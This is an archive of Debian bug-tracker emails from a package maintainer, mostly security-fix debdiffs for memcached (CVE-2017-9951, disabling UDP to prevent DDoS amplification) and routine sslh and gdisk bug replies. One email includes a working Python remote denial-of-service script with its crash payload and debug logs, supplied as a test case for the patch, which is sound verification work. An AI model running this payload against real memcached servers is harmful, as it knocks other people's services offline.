Bug#873758: stretch-pu: package memcached/1.4.33-1

2018-03-08 Thread Guillaume Delacour 
Hi,

I'm sorry i haven't find a sponsor to upload the security fix for CVE-2017-9951 
yet.
There is another fix that need to be uploaded to security: CVE-2018-1000115:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name  Version 
ArchitectureDescription
+++-=-===-===-===
ii  memcached 1.4.33-1
amd64   high-performance memory object caching system

$ sudo netstat -ltunp | grep memcached
tcp0  0 0.0.0.0:11211   0.0.0.0:*   LISTEN  
31885/memcached 
tcp6   0  0 :::11211:::*LISTEN  
31885/memcached 
udp0  0 0.0.0.0:11211   0.0.0.0:*   
31885/memcached 
udp6   0  0 :::11211:::*
31885/memcached

Versus:

$ dpkg --list memcached
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name  Version 
ArchitectureDescription
+++-=-===-===-===
ii  memcached 1.4.33-1+deb9u1 
amd64   high-performance memory object caching system
$ sudo netstat -ltunp | grep memcached
tcp0  0 0.0.0.0:11211   0.0.0.0:*   LISTEN  
478/memcached   
tcp6   0  0 :::11211:::*LISTEN  
478/memcached

Please find attached the following debdiff.

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog	2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog	2018-03-08 13:46:07.0 +0100
@@ -1,3 +1,15 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+  * Fix CVE-2018-1000115
++ debian/patches/10_CVE-2018-1000115.patch disable listening on UDP port by
+  default (from Ubuntu)
++ debian/NEWS add explanation and document how to re-enable UDP if
+  necessary.
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Thu, 08 Mar 2018 13:46:07 +0100
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
diff -Nru memcached-1.4.33/debian/NEWS memcached-1.4.33/debian/NEWS
--- memcached-1.4.33/debian/NEWS	2016-07-02 10:24:46.0 +0200
+++ memcached-1.4.33/debian/NEWS	2018-03-08 13:46:07.0 +0100
@@ -1,3 +1,11 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * memcached is now configured to disable its UDP port by default, to
+prevent its use as a DDoS amplifier. To re-enable UDP service, add
+'-U 11211' to /etc/memcached.conf and restart the memcached service.
+
+ -- Steve Beattie <sbeat...@ubuntu.com>  Fri, 02 Mar 2018 12:52:44 -0800
+
 memcached (1.4.20-1) unstable; urgency=medium
 
 Starting with this release, a system user "memcache" will be created.
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch	1970-01-01 01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch	2018-03-06 21:44:06.0 +0100
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 1

Bug#891907: memcached should disable UDP by default

2018-03-06 Thread Guillaume Delacour 
Hi,

Le 02/03/2018 à 12:39, Hanno Böck a écrit :
> Package: memcached
> Version: 1.4.33-1
> 
> Memcached is currently involved in some massive ddos attacks, see e.g.:
> https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
> 
> The UDP protocol of memcached can be abused for very effective DDoS
> amplification attacks and should therefore be considered dangerous.
> Upstream memcached has reacted to this by disabling UDP by default:
> https://github.com/memcached/memcached/wiki/ReleaseNotes156
> 
> In Debian memcached by default only listens to 127.0.0.1, but enables
> UDP. While the localhost-only protects default settings, it's still
> only a minor change away from creating an effective DDoS tool for a
> protocol that is hardly in use today. I recommend that you backport
> the upstream change and disable UDP by default.
> 

The version 1.5.6 will be uploaded in the archive in a few days.
I'll try to propose a backport patch at least for versions in stretch
and jessie (with upstream review, if possible).

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#863517: sslh systemd service file doesn't honor /etc/default/sslh

2018-03-03 Thread Guillaume Delacour 
Hi,

Le 28/05/2017 à 00:09, Cord Beermann a écrit :
> Package: sslh
> Version: 1.18-1
> Severity: normal
> 
> Hello,
> 
> I want to use sslh.service with the sslh-select option, but in
> /lib/systemd/system/sslh.service is /usr/sbin/sslh hardcoded. 
> 
> It should user the information in /etc/default/sslh instead (or switch over 
> to update-alternatives?)

systemd does not support a variable into ExecStart:

# service sslh status
● sslh.service - SSL/SSH multiplexer
   Loaded: error (Reason: Invalid argument)
[...]
[/lib/systemd/system/sslh.service:8] Executable path is not absolute,
ignoring: $DAEMON --foreground $DAEMON_OPTS

One other way is to wrapp the startup, or use alternative.
I'll look to this.

> 
> Cord
> 
> -- System Information:
> Debian Release: 8.8
>   APT prefers stable
>   APT policy: (999, 'stable'), (799, 'stable-updates'), (798, 
> 'proposed-updates'), (500, 'oldstable'), (299, 'testing'), (199, 'unstable'), 
> (1, 'experimental')
> Architecture: amd64 (x86_64)
> 
> Kernel: Linux 4.9.0-0.bpo.3-amd64 (SMP w/2 CPU cores)
> Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: systemd (via /run/systemd/system)
> 
> Versions of packages sslh depends on:
> ii  adduser  3.113+nmu3
> ii  debconf  1.5.56
> ii  init-system-helpers  1.22
> ii  libc62.19-18+deb8u9
> ii  libcap2  1:2.24-8
> ii  libconfig9   1.4.9-2
> ii  libwrap0 7.6.q-25
> ii  lsb-base 4.1+Debian13+nmu1
> ii  update-inetd 4.43
> 
> Versions of packages sslh recommends:
> ii  apache2 [httpd]  2.4.10-10+deb8u8
> ii  openssh-server [ssh-server]  1:6.7p1-5+deb8u3
> 
> Versions of packages sslh suggests:
> ii  openbsd-inetd [inet-superserver]  0.20140418-2
> 
> -- debconf information:
> * sslh/inetd_or_standalone: standalone
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#888529: memcached: Systemd private tmp breaks unix socket access to memcached

2018-03-03 Thread Guillaume Delacour 
tags 888529 + moreinfo
thanks

Hi,

Le 26/01/2018 à 19:57, Dennis Boone a écrit :
> Package: memcached
> Version: 1.5.4-1
> Severity: important
> 
> After applying this version the other night, our application was no
> longer able to connect to memcached via its unix socket.  (Since the
> systemd private tmp functionality is a damned rootkit, it too a while to
> diagnose this problem.)  The distributed configuration file appears to
> place the unix socket in /tmp.

The distributed configuration file does not provide a socket file
enabled; where is the socket you've defined with options "-s,
--unix-socket=" ?

Provided config files:
https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/memcached.conf
&&
https://github.com/memcached/memcached/blob/master/scripts/memcached.service
&&
https://anonscm.debian.org/cgit/collab-maint/memcached.git/tree/debian/patches/02_service_wrapper.patch

> 
> If systemd private tmp is to be enabled for memcached, the distributed
> configuration should place the unix socket elsewhere.  Alternately,
> private tmp could be disabled for memached.
> 
> 
> -- System Information:
> Debian Release: buster/sid
>   APT prefers unstable
>   APT policy: (500, 'unstable')
> Architecture: amd64 (x86_64)
> 
> Kernel: Linux 4.14.0-3-amd64 (SMP w/8 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8) (ignored: 
> LC_ALL set to es_US.UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) (ignored: 
> LC_ALL set to es_US.UTF-8)
> Shell: /bin/sh linked to /bin/bash
> Init: systemd (via /run/systemd/system)
> 
> Versions of packages memcached depends on:
> ii  adduser 3.116
> ii  libc6   2.26-5
> ii  libevent-2.1-6  2.1.8-stable-4
> ii  libsasl2-2  2.1.27~101-g0780600+dfsg-3
> ii  lsb-base9.20170808
> ii  perl5.26.1-4
> 
> memcached recommends no packages.
> 
> Versions of packages memcached suggests:
> pn  libanyevent-perl 
> pn  libcache-memcached-perl  
> pn  libmemcached 
> ii  libterm-readkey-perl 2.37-1+b2
> pn  libyaml-perl 
> 
> -- no debconf information
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#870819: gdisk: New upstream version 1.0.3 available

2017-09-20 Thread Guillaume Delacour 
Hi,

On Sat, 5 Aug 2017 16:12:54 +0200 Christoph Biedl
<debian.a...@manchmal.in-ulm.de> wrote:
> Package: gdisk
> Version: 1.0.1-1
> Severity: normal
> 
> Dear Maintainer,
> 
> upstream released a new version recently. Looking into the changes I
> found the following:
> 
> | Fixed a major bug that caused invalid partition tables to be generated
> | under some conditions.
> 
> In my humble opinion this justifies a swift upload of the new version.
> There are also some interesting changes listed for 1.0.2

I've prepared a new version on mentors and have such bug reports against
upstream code to changes/discuss. I've asked upstream some help to
triage them.

If no news received in the next few days, i'll try to contact my sponsor
to upload the new upstream release "as is".

> 
> Christoph
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#702963: gdisk doesn't align the end of partition

2017-09-20 Thread Guillaume Delacour 
Hi,

On Wed, 13 Mar 2013 17:11:32 +0400 sergio <mail...@sergio.spb.ru> wrote:
> Package: gdisk
> Version: 0.8.5-1
> Severity: important
> 
> gdisk doesn't align the end of partition:
> 
> 
> % dd if=/dev/zero of=test count=22
> % /sbin/gdisk test
> 
> Command (? for help): o
> This option deletes all partitions and creates a new protective MBR.
> Proceed? (Y/N): Y
> 
> Command (? for help): n
> Partition number (1-128, default 1): 
> First sector (34-199968, default = 2048) or {+-}size{KMGTP}: 
> Last sector (2048-199968, default = 199968) or {+-}size{KMGTP}: 
> 
> 

Sorry for my very late answer. Did you reproduce that on Debian 9
Stretch with release 1.0.1 ? Upstream has made many improvements in this
release.

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#778325: sgdisk --new changes given end sector parameter when using a unit for the start sector

2017-09-20 Thread Guillaume Delacour 
Hi,

On Fri, 13 Feb 2015 15:31:32 + Fabian Niepelt
<f.niep...@mittwald.de> wrote:
[...]
>
> I'm on Debian 7.0, amd64.
> 

Sorry for the lack of answer. Do you have the same problem on Debian
Stretch with version 1.0.1 ?

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#873758: stretch-pu: package memcached/1.4.33-1

2017-09-12 Thread Guillaume Delacour 


Le 12/09/2017 à 22:55, Adam D. Barratt a écrit :
> On Tue, 2017-09-12 at 22:52 +0200, Guillaume Delacour wrote:
>> Le 30/08/2017 à 21:58, Adam D. Barratt a écrit :
>>> Control: tags -1 + confirmed
>>>
>>> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>>>> The attached patch fix CVE-2017-9951 which has been not fixed via
>>>> a DSA,
>>>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/8
>>>> 68701.
>>>
>>> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
>>> +
>>> +  * Non-maintainer upload by the Security Team.
>>>
>>> So far as I can tell, you're not a member of the Security Team, so
>>> this
>>> is incorrect.
>>
>> Sure, please find attached the fixed debdiff, as i'm not a member of
>> the
>> security team. I've also changed the distribution from stretch to
>> stretch-security.
> 
> Why? "stretch-security" is an appropriate distribution to use for
> uploads to the security archive, in which case you should be talking to
>  the Security Team, not us. Assuming you're still proposing an update
> via proposed-updates and a point release, "stretch" was correct.

Indeed, absolutely right. Updated version attached.

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,10 @@
+memcached (1.4.33-1+deb9u1) stretch; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-25 
00:38:52.0 +0200
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch


signature.asc
Description: OpenPGP digital signature

Bug#873758: stretch-pu: package memcached/1.4.33-1

2017-09-12 Thread Guillaume Delacour 
Le 30/08/2017 à 21:58, Adam D. Barratt a écrit :
> Control: tags -1 + confirmed
> 
> On Wed, 2017-08-30 at 21:33 +0200, g...@iroqwa.org wrote:
>> The attached patch fix CVE-2017-9951 which has been not fixed via a DSA,
>> as discussed with Salvatore Bonaccorso: https://bugs.debian.org/868701.
> 
> +memcached (1.4.33-1+deb9u1) stretch; urgency=high
> +
> +  * Non-maintainer upload by the Security Team.
> 
> So far as I can tell, you're not a member of the Security Team, so this
> is incorrect.

Sure, please find attached the fixed debdiff, as i'm not a member of the
security team. I've also changed the distribution from stretch to
stretch-security.

> 
> +  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
> +replaces key/value pair
> +
> + -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
> 
> Please go ahead, bearing in mind the above comment.

As i'm not a DD nor DM i can't upload this directly, could you do this
for me as a mentoring ?
I also need to provide this kind of changes for Jessie.

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,10 @@
+memcached (1.4.33-1+deb9u1) stretch-security; urgency=high
+
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-25 
00:38:52.0 +0200
@@ -0,0 +1,36 @@
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check (CVE-2017-9951)
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch


signature.asc
Description: OpenPGP digital signature

Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function

2017-07-24 Thread Guillaume Delacour 
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed.
> 

Please find attached the debdiff for Debian 9 Stretch.
Also, you can find a little test case (and results) without 
(CVE-2017-9951_1.4.33.log) 
and with the fix (CVE-2017-9951_1.4.33_fixed.log). I've build and test it on a 
clean stretch schroot.

-- 
Guillaume Delacour
diff -Nru memcached-1.4.33/debian/changelog memcached-1.4.33/debian/changelog
--- memcached-1.4.33/debian/changelog   2016-11-03 01:50:27.0 +0100
+++ memcached-1.4.33/debian/changelog   2017-07-25 00:38:52.0 +0200
@@ -1,3 +1,11 @@
+memcached (1.4.33-1+deb9u1) unstable; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 25 Jul 2017 00:38:52 +0200
+
 memcached (1.4.33-1) unstable; urgency=medium
 
   * New upstream release, fix CVE-2016-8704, CVE-2016-8705, CVE-2016-8706
diff -Nru memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
01:00:00.0 +0100
+++ memcached-1.4.33/debian/patches/09_CVE-2017-9951.patch  2017-07-24 
21:59:20.0 +0200
@@ -0,0 +1,37 @@
+From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.33/debian/patches/series 
memcached-1.4.33/debian/patches/series
--- memcached-1.4.33/debian/patches/series  2016-08-21 18:48:58.0 
+0200
+++ memcached-1.4.33/debian/patches/series  2017-07-25 00:38:52.0 
+0200
@@ -1,3 +1,4 @@
 01_init_script_additions.patch
 04_add_init_retry.patch
 07_disable_tests.patch
+09_CVE-2017-9951.patch
<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26   0x00 0x00 0x00 0x82
>26   0x00 0x00 0x00 0x1d
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
26: going from conn_mwrite to conn_swallow
26: going from conn_swallow to conn_new_cmd
26: going from conn_new_cmd to conn_parse_cmd
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26   0x00 0x00 0x00 0x82
>26   0x00 0x00 0x00 0x1d
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
>26   0x00 0x00 0x00 0x00
26: going from conn_nread to conn_mwrite
Failed to write, and not due to blocking: Broken pipe
26: going from conn_mwrite to conn_closing
<26 connection closed.
26: going from conn_closing to conn_closed
<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:

Bug#868701: memcached: CVE-2017-9951: Heap-based buffer over-read in try_read_command function

2017-07-24 Thread Guillaume Delacour 
On Mon, Jul 17, 2017 at 10:34:23PM +0200, Salvatore Bonaccorso wrote:
> 
> Please adjust the affected versions in the BTS as needed.

Please find attached the debdiff for Debian 8 Jessie.
Also, you can find a little test case (and results) without 
(CVE-2017-9951_exploit.log) 
and with the fix (CVE-2017-9951_fixed.log). I've build and test it on a clean 
jessie schroot.

> 
> Regards,
> Salvatore
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog
--- memcached-1.4.21/debian/changelog   2016-11-01 21:10:45.0 +
+++ memcached-1.4.21/debian/changelog   2017-07-24 20:07:10.0 +
@@ -1,3 +1,11 @@
+memcached (1.4.21-1.1+deb8u2) unstable; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix CVE-2017-9951 by checking the integer length of commands that adds or
+replaces key/value pair
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Mon, 24 Jul 2017 19:54:18 +
+
 memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high
 
   * Non-maintainer upload by the Security Team.
diff -Nru memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch 
memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch
--- memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch  1970-01-01 
00:00:00.0 +
+++ memcached-1.4.21/debian/patches/09_CVE-2017-9951.patch  2017-07-24 
19:59:20.0 +
@@ -0,0 +1,37 @@
+From 328629445c71e6c17074f6e9e0e3ef585b58f167 Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Tue, 4 Jul 2017 00:32:39 -0700
+Subject: [PATCH] sanity check
+Origin: upstream, 
https://github.com/memcached/memcached/commit/328629445c71e6c17074f6e9e0e3ef585b58f167
+
+---
+ items.c | 2 ++
+ memcached.c | 2 +-
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/items.c b/items.c
+index 637e5e745..83a2ea37d 100644
+--- a/items.c
 b/items.c
+@@ -368,6 +368,8 @@ void item_free(item *it) {
+ bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
+ char prefix[40];
+ uint8_t nsuffix;
++if (nbytes < 2)
++return false;
+ 
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes,
+  prefix, );
+diff --git a/memcached.c b/memcached.c
+index 0f0335795..a89df965d 100644
+--- a/memcached.c
 b/memcached.c
+@@ -4967,7 +4967,7 @@ static void drive_machine(conn *c) {
+ 
+ case conn_swallow:
+ /* we are reading sbytes and throwing them away */
+-if (c->sbytes == 0) {
++if (c->sbytes <= 0) {
+ conn_set_state(c, conn_new_cmd);
+ break;
+ }
diff -Nru memcached-1.4.21/debian/patches/series 
memcached-1.4.21/debian/patches/series
--- memcached-1.4.21/debian/patches/series  2016-11-01 21:10:45.0 
+
+++ memcached-1.4.21/debian/patches/series  2017-07-24 20:07:26.0 
+
@@ -5,3 +5,4 @@
 06_eol_comment_handling.patch
 07_disable_tests.patch
 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch
+09_CVE-2017-9951.patch
#!/usr/bin/python
# thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt &&
# https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/
import sys
import socket

print "Memcached Remote DoS"
if len(sys.argv) != 3:
print "Usage: %s  " %(sys.argv[0])
sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]

print "[+] Target Host: %s" %(target)
print "[+] Target Port: %s" %(port)

kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"""
kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000)

hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
hax.connect((target, int(port)))
print "[+] Connected, firing payload!"
except:
print "[-] Connection Failed... Is there even a target?"
sys.exit(1)
try:
hax.send(kill)
print "[+] Payload Sent!"
except:
print "[-] Payload Sending Failure... WTF?"
sys.exit(1)
hax.close()
print "[*] Should be dead..."

<26 new auto-negotiating client connection
26: going from conn_new_cmd to conn_waiting
26: going from conn_waiting to conn_read
26: going from conn_read to conn_parse_cmd
26: Client using the binary protocol
<26 Read binary protocol data:
<260x80 0x12 0x00 0x01
<260x08 0x00 0x00 0x00
<260xff 0xff 0xff 0xe8
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
<260x00 0x00 0x00 0x00
26: going from conn_parse_cmd to conn_nread
<26 ADD x Value len is -33
>26 Writing an error: Out of memory allocating item
>26 Writing bin response:
>26   0x81 0x12 0x00 0x00
>26

Bug#853544: memcached: ftbfs with GCC-7

2017-07-24 Thread Guillaume Delacour 
tags 853544 + pending
thanks

On Tue, 21 Mar 2017 21:37:27 +0100 Guillaume Delacour <g...@iroqwa.org>
wrote:
> tags 853544 upstream fixed-upstream
> thanks
> 

> 
> All is now fine with release 1.4.36
> (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b),
> will be released after the freeze in unstable.
> 

I've prepared version 1.5.0, which will be uploaded soon.

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#869479: memcached: New upstream version available

2017-07-24 Thread Guillaume Delacour 
tags 869479 + pending
thanks

On Sun, Jul 23, 2017 at 05:14:52PM +0200, Salvatore Bonaccorso wrote:
> Source: memcached
> Severity: wishlist
> 
> Hi

Hi,

> 
> There is a new upsteam version available, v1.5.0. Could you please
> package the new version?

I've prepared it on mentors [0] and my current mentor will upload it soon 
surely at the end of this week.

[0]: 
https://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.5.0-1.dsc

